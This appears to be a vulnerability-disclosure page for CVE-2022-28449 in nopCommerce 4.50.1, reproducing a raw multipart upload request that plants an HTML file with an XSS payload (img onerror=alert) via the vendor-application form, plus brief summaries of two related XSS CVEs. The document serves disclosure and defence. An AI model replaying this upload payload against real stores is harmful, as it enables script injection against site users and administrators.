Headline
CVE-2022-28449: Unrestricted File Upload in Apply for vendor account feature · Issue #6192 · nopSolutions/nopCommerce
nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). At Apply for vendor account feature, an attacker can upload an arbitrary file to the system.
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Name"
pentester
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Email"
[email protected]
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Description"
Unrestricted File Upload in Apply for vendor account feature
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="uploadedFile"; filename="script.html"
Content-Type: text/html
<h1>Testing upload file by TF1T<img src=x onerror=alert(document.domain)></h1>
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="apply-vendor"
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="__RequestVerificationToken"
CfDJ8PCrMQQMCTdOtvWnrq2WpITJLfTjickNjSm_qcSluUiK-_7c-VbzzTCok-M1duwMopvVKCMTy1GmrmTtQnch6SHfSXemzptzz2nOOP8uW4X6qGD2Z-1lPLct2WQrWDBY1qV5aGgzwe2T_2BneJo-5FzzMeW1b0o9epdkZ_hZpu-4UqN6zwTaxYTx-gFvJBoFaw
-----------------------------353170076619137176562598160618--
Related news
CVE-2022-28450: XSS issue in the "Text" parameter (forums) · Issue #6194 · nopSolutions/nopCommerce
nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS) via the "Text" parameter (forums) when creating a new post, which allows a remote attacker to execute arbitrary JavaScript code at client browser.
CVE-2022-28448: Stored XSS in customer name when customer accessed deny resource and redirect to login page · Issue #6191 · nopSolutions/nopCommerce
nopCommerce 4.50.1 is vulnerable to Cross Site Scripting (XSS). An attacker (role customer) can inject javascript code to First name or Last name at Customer Info.